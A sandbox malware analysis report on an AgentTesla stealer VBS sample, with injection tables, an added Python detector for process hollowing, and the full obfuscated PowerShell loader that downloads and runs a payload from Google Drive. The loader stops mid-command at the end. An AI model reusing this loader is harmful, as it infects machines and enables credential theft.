Malware Analysis Report

2024-11-13 14:21

Sample ID 240618-lkxn4sxfqf
Target STS_Bunker_00617.vbs
SHA256 9aa64f43d090ff657848da74a0c2ea1f3211fa1d88ac3fa603e65d724360a957
Tags
agenttesla execution keylogger spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

9aa64f43d090ff657848da74a0c2ea1f3211fa1d88ac3fa603e65d724360a957

Threat Level: Known bad

The file STS_Bunker_00617.vbs was found to be: Known bad.

Malicious Activity Summary

agenttesla execution keylogger spyware stealer trojan

AgentTesla

Blocklisted process makes network request

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Command and Scripting Interpreter: PowerShell

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: MapViewOfSection

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-18 09:36

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-18 09:36

Reported

2024-06-18 09:38

Platform

win7-20240611-en

Max time kernel

147s

Max time network

139s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\STS_Bunker_00617.vbs"

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Legitimate hosting services abused for malware hosting/C2

Description | Indicator | Process | Target
N/A | drive.google.com | N/A | N/A
N/A | drive.google.com | N/A | N/A
N/A | drive.google.com | N/A | N/A

Looks up external IP address via web service

Description | Indicator | Process | Target
N/A | api.ipify.org | N/A | N/A
N/A | api.ipify.org | N/A | N/A
N/A | ip-api.com | N/A | N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 2756 set thread context of 596 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious behavior: MapViewOfSection

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 2996 wrote to memory of 2828 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2996 wrote to memory of 2828 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2996 wrote to memory of 2828 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2828 wrote to memory of 1604 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe
PID 2828 wrote to memory of 1604 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe
PID 2828 wrote to memory of 1604 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe
PID 2828 wrote to memory of 2756 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2828 wrote to memory of 2756 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2828 wrote to memory of 2756 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2828 wrote to memory of 2756 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 2700 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2700 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2700 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2700 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 596 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe
PID 2756 wrote to memory of 596 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe
PID 2756 wrote to memory of 596 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe
PID 2756 wrote to memory of 596 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe
PID 2756 wrote to memory of 596 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe
PID 2756 wrote to memory of 596 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe
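Read together, the WriteProcessMemory and SetThreadContext rows describe one chain: WScript.exe (2996) spawns the 64-bit powershell.exe (2828), which spawns cmd.exe (1604) and a second, 32-bit powershell.exe under syswow64 (2756); that 32-bit process spawns its own cmd.exe (2700) and wab.exe (596), writes into wab.exe and then sets its thread context. A parent writing into a child it has just created is routine, which is why the cmd.exe rows are noise; a parent that both writes into a child and then calls SetThreadContext on it is the process-hollowing sequence, and the target being a signed Microsoft binary (wab.exe) that has no business being started by PowerShell is what turns the row into a finding. The Python below is an added example, not part of this report, that correlates rows in this table's format into that chain: the first PID to write into a new PID is treated as its spawner, and a PID that is both written to and has its thread context set by the same writer is reported as the hollowing victim. The input is the rows above, copied with the repeated lines collapsed; `find_hollowing` and `parse_rows` are names chosen here.

```python
"""Added example (not part of the sandbox report): correlate WriteProcessMemory
and SetThreadContext signature rows into a process-injection chain."""
import re

# Rows copied from the two signature tables above (behavioral1), with the
# page's repeated lines collapsed. One duplicate is kept to show it is harmless.
ROWS = r"""
PID 2996 wrote to memory of 2828 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2828 wrote to memory of 1604 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2828 wrote to memory of 2756 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 2700 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 596 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2756 wrote to memory of 596 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2756 set thread context of 596 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
"""

# Both image paths start with "C:\", so a non-greedy match up to " C:\" splits
# them even though the paths themselves contain spaces.
ROW_RE = re.compile(
    r"^PID (\d+) (wrote to memory of|set thread context of) (\d+) N/A (C:\\.*?) (C:\\.*)$"
)


def parse_rows(text):
    """Return (src_pid, kind, dst_pid, src_image, dst_image) for each recognised row."""
    events = []
    for line in text.strip().splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            src, action, dst, src_img, dst_img = m.groups()
            kind = "write" if action.startswith("wrote") else "setctx"
            events.append((int(src), kind, int(dst), src_img, dst_img))
    return events


def find_hollowing(text):
    """Return the injection chain, or None when no PID is both written to and has
    its thread context set by the same writer (the hollowing signature)."""
    events = parse_rows(text)
    image, parent, written = {}, {}, set()
    for src, kind, dst, src_img, dst_img in events:
        image.setdefault(src, src_img)
        image.setdefault(dst, dst_img)
        if kind == "write":
            written.add((src, dst))
            parent.setdefault(dst, src)   # first writer into a fresh PID is its spawner
    hits = [(s, d) for s, k, d, _, _ in events if k == "setctx" and (s, d) in written]
    if not hits:
        return None
    injector, victim = hits[0]
    chain = [victim]                      # walk back to the root of the tree
    while chain[-1] in parent:
        chain.append(parent[chain[-1]])
    chain.reverse()
    return {
        "chain": [(pid, image[pid].rsplit("\\", 1)[-1]) for pid in chain],
        "injector": image[injector],
        "injector_is_wow64": "\\syswow64\\" in image[injector].lower(),
        "victim": image[victim],
    }


if __name__ == "__main__":
    print(find_hollowing(ROWS))
```

In an EDR the same logic is a join on source PID: one process that issues both WriteProcessMemory and SetThreadContext against the same target, where the target image is a Microsoft-signed binary and the source is a script host. The `injector_is_wow64` flag is worth keeping in the alert: the 64-bit powershell.exe deliberately relaunched itself under syswow64 before touching wab.exe, so a rule that only watches the native powershell.exe path misses the injection step.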

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\STS_Bunker_00617.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -windowstyle 1 "cls;$Scrotums = 1;$Bruta='ring';$Beelzebub='S';Function gigged($Gladden){$Hejsevrkets=$Gladden.Length-$Scrotums;$Maksimumstraffene=$Beelzebub+'ubst'+$Bruta;For( $Subarachnoidean=7;$Subarachnoidean -lt $Hejsevrkets;$Subarachnoidean+=8){$Brandering+=$Gladden.$Maksimumstraffene.Invoke( $Subarachnoidean, $Scrotums);}$Brandering;}function Alcaldes($Allograft){ . ($Afkortersav) ($Allograft);}$Mobilianer=gigged ' GetlinMLegitimo KobberzAkkill iAmadeuslYnkentrlTankrenaInforma/Styrtet5Trlkvin.Program0boy.ele Tinklin(bogudlaWTrykkeri SvmmehnDiskogrd kursisoAnabataw hotinisLejespa SkulptrNVermeskTNuancin comeba1Misdan 0mosel.v.Afklaps0B,kning;M.ggede filmkonW BilagsiSynartenDisinsu6 Ydervg4Cad.ish;Mate ia SengelxCata an6Usasunf4 Tempel;Papirar LycopsirSymmetrve dyson:Electre1 Coron 2Overswe1 T,unch.Afflict0,tivels)Inrig,e PrdispoGKaerligeScourwec InterckSov reioSulphet/Parison2 Wristb0Corn,ra1Skvadre0Unbehel0Be.gqvi1fack.ns0 Flagar1Termins Salg arF .orsttiTeko.perSheik reCoynessfWrongs,oIntercaxM,linge/ Ejendo1 Grinn,2Herutde1 Bldt.a. Jaunti0pachyhe ';$Returgodset=gigged 'SandsynUTamsvinsMyoprote Spiller Udspio-I.rksatAPlayaedgVilj kreGemmatinRe eceitProtohe ';$Hovedindgange=gigged 'Trimpreh P ojektmoonseetOver,lopAbdicers Udsu,e: Gatewo/ nfluer/ReklapsdEfter krOnio.skiFlgesedvU,mgngeeEtheri . 
LaplangPsykt.roCrabieroJewfishg VilloslCamoudieOceanw .FuscindcInactivoBetul.nmB.landr/ mul,iluPretenccPerikon?InsolubeAlcoholxAppendipRaceforolidokilrDopingdtLagerfo=,alrensd Bilf,boHjortetw ,uadranGodsendlSlvvrdioSees,wsaBittingdSerarh &OnonisviBrsspekdGavlvgg=Slu.bet1JustifiE Gan.hil .etallVgrfter,L S,adsa3SocialvptrinelycBlainsgSvagin,cdM,rsomefFremmanmUnoxidioHenkastM Popk mn witt.dWMakvr.eJSup.ame2Opsmnin- .ariferSlentre9papegjebpneumon- HarpikHPinballe Picks WSprogbat JapygiFR dningCStampubtdeoxi,aZNonio,i5,ibrere_Unscrut ';$Flyvevaabnet=gigged ' Dutch >Ph.toet ';$Afkortersav=gigged 'UnproviiLa inioeLystyacxPrecalc ';$Behagelige='Epithecium';$Krigssituationens = gigged ' tteaareDeclinecDeciduihNymph,noBilleds Camorri%VerrucuaSkurepupSolda,epTalarendMaitresaStandarttitu,eraEjendom% Lycop \FinansiCGenop oy LampwosFolkerotPonziteeNaumac nProgramcReallnshAflusniyMiekelimW andote stoc r.Cytostsa ForberaHallucinpatriar Uddykni&Pry.end& Ko.nek PuslingeMaremmacLekane hTyktarmo galiva Sadleplt.kovbyg ';Alcaldes (gigged ' ransfu$S,uglergAnorectlAgustemoconfuteb mutilaaAnhidrolVari bi: Hygsombunconsiy,emaaregPolkaernSkatkamiF.lmfornRestitugGri,hcrsDknavnerS rkproeTremmefgTangydilNsensabeDissimimSp,inkleFoelgenn HeltaltProbosceGrammatrUnarmednStrm.ore ChagrisLibert,=Virkeli(Guldf,sc tricy mRespittdPenname Dressi/PhysiotcPoin el Hvordan$ O,tpreK Impl,ar Disambi Don.tigSphenopsAmbulansUnthin,iYouthprtSlangetudioptraaUdtolketLikvidei ulfoetoSemifasn SteeraeovergesnIntranssFornrme)Dippene ');Alcaldes (gigged ' Parket$t rottlgForhandlTubfulsoBre dbobHer,kera ReprovlU,demon:ti,blivSAnskaf.pJernsbeeSen.elljSnoretrlEl iptikFactoria Jarid.bEcrufariu viklen ulfilmeThallict agfrertTidtag,e OrganorBalstyrn UnpropeDaybreasamurc.s=produkt$NonexclHskyldfloskyttegvBesk kkeBlas ogd NglelniEks,mennHmskodidCellulogAdfr,svaBov risnKoordingAvisereeFunktio.SquushisAk ariepSpejlgllOxyrhyniTaxamettForraad(Forehol$Tilv,jeF nitchilviderefyunderbuvBadevaneAr.angev Ro.aada Proctoareattirb 
S,ordrnIsohexyeTerroritAfhu,ni) Xanth. ');Alcaldes (gigged 'Chromop[ forpurNKom ureeRaakuldtInterre..epatomSL.calizeReteachrAffrontvHavnelbiRespecicp.rsonkeSipli.gPBalmorao J.rdvoiGuldfisnForkleltPlanlgnM Udkasta QuinibnSkeforsa eltiekgHysteroeM crolirOvertrk]Angreso:Alalusp:WudvagiSComprize Sc.phocSlappesuSclerotrMrk,ligiHandelst noneluyUndisobPBar iesrChaiseloSan,arat GrundfoLegehusc Oc.locoHyperpelAu,oinf noninfe=spagnuo Designv[UnpieceNpro euce S anestWorkpa...unicidSTushesse Deossic kiddoouCentralrUltima,iGulvtpptLuce.esyGnuerneP ,ubocarHijackeo KolonitHusl,jeoDomingtcMetermaoA,aiterlAfskrmnTbryllupyFranskmpTransube,laceab]Bag.ind: Phon.m:unipolrTJallsudlIsotopys,ompost1Palaeop2Overo.h ');$Hovedindgange=$Spejlkabinetternes[0];$Seducer223= (gigged 'Benaadn$ Tu.vedgBeake.zlUngridhoHanekrobblreb gaAfskedslMi.vsan:f.ntasitPr surmeStratifsReuttert SeriogsSh.lteriOpliverg Se,ncinforskrea Nonoptl Regelf= StopmtNKopierieadminicwFeriebo-FluoromOVo.rloobBadsdirjBrilleneRebbenecLykkelit Ludfat D sertiSdemicriyVandrinsSkri eatBl.delseAandsv m M.ondo. SejlfrNTilendee DraftetStrangu.Renum eWUnionizeKamt.kkbAnsatssCP asoidlCa pereiK rolineOsteoidnGinghamt');$Seducer223+=$bygningsreglementernes[1];Alcaldes ($Seducer223);Alcaldes (gigged ' romeme$PikningtKrigs,jeSpurreysBerndhut komplesAfmejesiFemor,cgPublicenSjlcomiaGibli.il Pickee.Struct.H AshmaneDomest,aTudendedBandaiteAgrodolrSalpe esJydepot[Oliv ri$DaftarpROino hoePrepdmitBogsamluscampinrLev ringFlobprooSyndsfodU.foressVarmep,eGhandictButt.rc]Trosive=D,walki$demoph MFabriksoSynkrotbMoolvieiProton,lSkoleraiSkurkesaKarak,enVerbalieDownstrrUnvola. ');$Lysregulering183=gigged ' ,gbomb$CajussutPerfecteRecensisBedsid tbe olknsrickettiMo.genfgBellmounBeramunamdomtollEjstrup. 
MachaiDUgestemoPyrophowSkandinnBilledflPrespecoProdu,taUn,arbldLysenehFReaumuriJazz,edlSandhedeObjektk(Tyredes$Sheri tHSi.kesnoVoldsomvNotedeseObtusildUpmounti nviolenTeledusdSpejlengButinfoa Hebre nUnfrolig OmstteeSnowsto, whigov$OfferlaR S,inulo N.nresuNonselegEburniahWo,ennehUligevgoForsideuKkkenmasDispurpe UdtalesForvari)Unp.rce ';$Roughhouses=$bygningsreglementernes[0];Alcaldes (gigged 'Overana$CreedalgIndkrsulFngetreoExcu atbSph.ngoa Hemoprl .hurch:TvrskibUClarisanfrontsoc Ro.anfu Fejl.arMeridiosRawishdiCatchxen larg sgPsychot=Bevari,( hysicT Las.voeFemogtyshakkekdt noreks-GkkensjPGraenseaViceco.t IldspahForklar byplads$DomssagR NordfaoSprjtehuProle ogProletahB,andymhPerspekoTopviewuArm.tols Angol.e Efte,ksprete,d) Termin ');while (!$Uncursing) {Alcaldes (gigged ' Rekt.o$ ,estilgStbeforlfl,gdagoArchsteb LaboraaAdoptiolKrystal:Lo,lygaOUnrot,npCognisilIrrestri Sel.erv Uforsvn,ondekniSi.kerhnFortrolgForme ns Romeos=Fry eli$KnoldentgardwurrTelefonu.lowshoeSili,ot ') ;Alcaldes $Lysregulering183;Alcaldes (gigged 'BatrachSShampontProgramabiklangr.etamertForsorg-DictyosSGrosgralPrjudiceSupersaeSt.machpMucigen Teddedg4Precon, ');Alcaldes (gigged ' Unwave$Negering.yggelilStinashoPe.sonabvi,jestaTerephtlPassan,:PaakldnUHjemka,nStrkbancrestlaguTtskrevrSummetosSkftni,iOmgaaelnAbscissg,rester=Astroph(Dyrek,eT KeelfaeOutd,insDesinfetOctod,c-Possi,lPUncomp,aLoasacetReklamehJournal Gen.pbl$MarplotRSubdir.oModbrplu Diri egUnlashehHoldundhTudkoppo FormasuHemimors FunktieGehngsos Hanker)Silicle ') ;Alcaldes (gigged 'S,rhatu$PugilisgPruderelVicuallo,rigittbSchokkeaTerti.mlPiedtak:hygiejnB wagnerrPolygonaAspargenEuroviscNovatiohD,ostyleRecipierDowieisnEnnoblee Epapop=Mafiam,$,ybdebogFusionslHandlinoFeltworbSmugkr aGluco ilKnoppen:KompottRCostbeneequalsiv Udlg.eoFenacetlPredetau VirtuatOverlbsijustifioTidenden Acat aiAdminisz B,drageInsa iemSanidineGra ddanLykkeskt ,harcusTar squ+Hostile+Fartjsf%Nyintro$ SidehnSElannorpTyrestaeVr.sttej .etninlFouragekForkbsraDesti eb 
UpturniTagdrypnSprgepae Korsikt Liste,tManualae fgretr Necropn Nonexte TongfisStran i.Udplukkc edpanboPukishnuWago.ern OrganitProg os ') ;$Hovedindgange=$Spejlkabinetternes[$Brancherne];}$Horsiness=315407;$Gaullists=29994;Alcaldes (gigged 'Dazzlin$Skud idgQuestiol Gryde,o Tyvek.bRomanilaBetalinlHumoris:Sedu,itBPremiereJugulard Remol oI.dlyseeAfgassem billotmNokkerteVulca is Dru.he Usleben=Reinars SuperaG St vnieBogs.avtResugg,-SnklodmCStaalvaoDy,efornFriherrt KejsereLon heanPapmlketAdminis Minefie$ EloqueR VandtioRessortu MundhegHjl.efihCa,orizhHemihedotriathluDirektos FjernveopflgnisHyrdebr ');Alcaldes (gigged ' A.jung$Bra,derg edenaglQuizzicoParti,lb KommeraSub roclKildesk:Neu ochl UnactpgUberygttTopsejlrChar lyeu,prosc L,tosol= Avantg Pa.sers[PlagiotSFo djelyBreib.ksReplenitlsgaaeneHolde im Tallin.F.edreuCUndervio MonoounMentionviteaceaeIndtastrFiltrattShahzad]Sprayda:Sigmoid:B.ttedeFCarabinrSkidtero,malgammUndescrBBoligpoaVolontrsAntis oe Hamito6Lionhoo4Das.tbuSFarvebatIndkaldrPigtraaiLutidinnwendykegThunder(Bastard$Pa,tomiBCharadee UheldidOfficieoElinguaeF.rretnm AfsvammBarrac e grnskisEfterk,)Statsho ');Alcaldes (gigged 'Museurt$Iltelegg Postcol,kridteoNonpassbLettilgaMaskottlf,stela:MetalizdBeflattiHumaneimBarbareiS.fetyanS oliatu Oestrat Bab lliHoresrev.onsensiFabrikaz Lo.snieUnhothys Fisker Tilsted= Skippe das rti[ResponsSDrejerey,dminissPl.teryt TillideUbeskytmGamene..S.ndhedTTalvrdieInd ragxforulemt,llotro.aendr fEMicroscnCat dvacRepl kkoBepraykd,ataniciPhenoplnBrakerog Pen,ui]Sandara: Regneb:NavigatAFarmakoSLunte aCSiru,shIneins,pIFedeka .DiacoelGregisteeHenvej.tStudielS llianctMacrotor DedoloiSilde.enAabenragC,ckshu(.rythem$Bagklogl R.ngbig,umultetVentricr IndlaeeVgenssc) Outlop ');Alcaldes (gigged 'P,ecere$Git esvgquasijulKonsuleoLang urb irkulra SammenlIkldtca:R,seredHShrewdya ExplornKaritasdBastku,s,iltypeo Kn.bbem HovedveAfs emmnHumanizeBobsldesBedragesBrudebu=Repenni$ CentradSpottiniAnarkosmLasso.ui schrodn AfhjlpuFlamme 
tSystemviW,ttishvFortovsiNat naezEuklidseIlkaphosNeutron. UdnyttsUlyksaluDrukmaabTand,ursFolkevatGiftstorRetversi manuranGlyco.igSkraast(M,dsige$OmhandlHCutes.koKo,tunnrHaarbrss Rosa.eiIl.ustrn.akenere Rinsu.sBit oensOutthro,Subvic $DagsproGMutabelaEne.ralu BlodtrlRetmssilDeterm,i Begonis Knowl,tSkf,nins olivil)Goads e ');Alcaldes $Handsomeness;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Cystenchyme.aan && echo t"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;$Scrotums = 1;$Bruta='ring';$Beelzebub='S';Function gigged($Gladden){$Hejsevrkets=$Gladden.Length-$Scrotums;$Maksimumstraffene=$Beelzebub+'ubst'+$Bruta;For( $Subarachnoidean=7;$Subarachnoidean -lt $Hejsevrkets;$Subarachnoidean+=8){$Brandering+=$Gladden.$Maksimumstraffene.Invoke( $Subarachnoidean, $Scrotums);}$Brandering;}function Alcaldes($Allograft){ . ($Afkortersav) ($Allograft);}$Mobilianer=gigged ' GetlinMLegitimo KobberzAkkill iAmadeuslYnkentrlTankrenaInforma/Styrtet5Trlkvin.Program0boy.ele Tinklin(bogudlaWTrykkeri SvmmehnDiskogrd kursisoAnabataw hotinisLejespa SkulptrNVermeskTNuancin comeba1Misdan 0mosel.v.Afklaps0B,kning;M.ggede filmkonW BilagsiSynartenDisinsu6 Ydervg4Cad.ish;Mate ia SengelxCata an6Usasunf4 Tempel;Papirar LycopsirSymmetrve dyson:Electre1 Coron 2Overswe1 T,unch.Afflict0,tivels)Inrig,e PrdispoGKaerligeScourwec InterckSov reioSulphet/Parison2 Wristb0Corn,ra1Skvadre0Unbehel0Be.gqvi1fack.ns0 Flagar1Termins Salg arF .orsttiTeko.perSheik reCoynessfWrongs,oIntercaxM,linge/ Ejendo1 Grinn,2Herutde1 Bldt.a. Jaunti0pachyhe ';$Returgodset=gigged 'SandsynUTamsvinsMyoprote Spiller Udspio-I.rksatAPlayaedgVilj kreGemmatinRe eceitProtohe ';$Hovedindgange=gigged 'Trimpreh P ojektmoonseetOver,lopAbdicers Udsu,e: Gatewo/ nfluer/ReklapsdEfter krOnio.skiFlgesedvU,mgngeeEtheri . 
LaplangPsykt.roCrabieroJewfishg VilloslCamoudieOceanw .FuscindcInactivoBetul.nmB.landr/ mul,iluPretenccPerikon?InsolubeAlcoholxAppendipRaceforolidokilrDopingdtLagerfo=,alrensd Bilf,boHjortetw ,uadranGodsendlSlvvrdioSees,wsaBittingdSerarh &OnonisviBrsspekdGavlvgg=Slu.bet1JustifiE Gan.hil .etallVgrfter,L S,adsa3SocialvptrinelycBlainsgSvagin,cdM,rsomefFremmanmUnoxidioHenkastM Popk mn witt.dWMakvr.eJSup.ame2Opsmnin- .ariferSlentre9papegjebpneumon- HarpikHPinballe Picks WSprogbat JapygiFR dningCStampubtdeoxi,aZNonio,i5,ibrere_Unscrut ';$Flyvevaabnet=gigged ' Dutch >Ph.toet ';$Afkortersav=gigged 'UnproviiLa inioeLystyacxPrecalc ';$Behagelige='Epithecium';$Krigssituationens = gigged ' tteaareDeclinecDeciduihNymph,noBilleds Camorri%VerrucuaSkurepupSolda,epTalarendMaitresaStandarttitu,eraEjendom% Lycop \FinansiCGenop oy LampwosFolkerotPonziteeNaumac nProgramcReallnshAflusniyMiekelimW andote stoc r.Cytostsa ForberaHallucinpatriar Uddykni&Pry.end& Ko.nek PuslingeMaremmacLekane hTyktarmo galiva Sadleplt.kovbyg ';Alcaldes (gigged ' ransfu$S,uglergAnorectlAgustemoconfuteb mutilaaAnhidrolVari bi: Hygsombunconsiy,emaaregPolkaernSkatkamiF.lmfornRestitugGri,hcrsDknavnerS rkproeTremmefgTangydilNsensabeDissimimSp,inkleFoelgenn HeltaltProbosceGrammatrUnarmednStrm.ore ChagrisLibert,=Virkeli(Guldf,sc tricy mRespittdPenname Dressi/PhysiotcPoin el Hvordan$ O,tpreK Impl,ar Disambi Don.tigSphenopsAmbulansUnthin,iYouthprtSlangetudioptraaUdtolketLikvidei ulfoetoSemifasn SteeraeovergesnIntranssFornrme)Dippene ');Alcaldes (gigged ' Parket$t rottlgForhandlTubfulsoBre dbobHer,kera ReprovlU,demon:ti,blivSAnskaf.pJernsbeeSen.elljSnoretrlEl iptikFactoria Jarid.bEcrufariu viklen ulfilmeThallict agfrertTidtag,e OrganorBalstyrn UnpropeDaybreasamurc.s=produkt$NonexclHskyldfloskyttegvBesk kkeBlas ogd NglelniEks,mennHmskodidCellulogAdfr,svaBov risnKoordingAvisereeFunktio.SquushisAk ariepSpejlgllOxyrhyniTaxamettForraad(Forehol$Tilv,jeF nitchilviderefyunderbuvBadevaneAr.angev Ro.aada Proctoareattirb 
S,ordrnIsohexyeTerroritAfhu,ni) Xanth. ');Alcaldes (gigged 'Chromop[ forpurNKom ureeRaakuldtInterre..epatomSL.calizeReteachrAffrontvHavnelbiRespecicp.rsonkeSipli.gPBalmorao J.rdvoiGuldfisnForkleltPlanlgnM Udkasta QuinibnSkeforsa eltiekgHysteroeM crolirOvertrk]Angreso:Alalusp:WudvagiSComprize Sc.phocSlappesuSclerotrMrk,ligiHandelst noneluyUndisobPBar iesrChaiseloSan,arat GrundfoLegehusc Oc.locoHyperpelAu,oinf noninfe=spagnuo Designv[UnpieceNpro euce S anestWorkpa...unicidSTushesse Deossic kiddoouCentralrUltima,iGulvtpptLuce.esyGnuerneP ,ubocarHijackeo KolonitHusl,jeoDomingtcMetermaoA,aiterlAfskrmnTbryllupyFranskmpTransube,laceab]Bag.ind: Phon.m:unipolrTJallsudlIsotopys,ompost1Palaeop2Overo.h ');$Hovedindgange=$Spejlkabinetternes[0];$Seducer223= (gigged 'Benaadn$ Tu.vedgBeake.zlUngridhoHanekrobblreb gaAfskedslMi.vsan:f.ntasitPr surmeStratifsReuttert SeriogsSh.lteriOpliverg Se,ncinforskrea Nonoptl Regelf= StopmtNKopierieadminicwFeriebo-FluoromOVo.rloobBadsdirjBrilleneRebbenecLykkelit Ludfat D sertiSdemicriyVandrinsSkri eatBl.delseAandsv m M.ondo. SejlfrNTilendee DraftetStrangu.Renum eWUnionizeKamt.kkbAnsatssCP asoidlCa pereiK rolineOsteoidnGinghamt');$Seducer223+=$bygningsreglementernes[1];Alcaldes ($Seducer223);Alcaldes (gigged ' romeme$PikningtKrigs,jeSpurreysBerndhut komplesAfmejesiFemor,cgPublicenSjlcomiaGibli.il Pickee.Struct.H AshmaneDomest,aTudendedBandaiteAgrodolrSalpe esJydepot[Oliv ri$DaftarpROino hoePrepdmitBogsamluscampinrLev ringFlobprooSyndsfodU.foressVarmep,eGhandictButt.rc]Trosive=D,walki$demoph MFabriksoSynkrotbMoolvieiProton,lSkoleraiSkurkesaKarak,enVerbalieDownstrrUnvola. ');$Lysregulering183=gigged ' ,gbomb$CajussutPerfecteRecensisBedsid tbe olknsrickettiMo.genfgBellmounBeramunamdomtollEjstrup. 
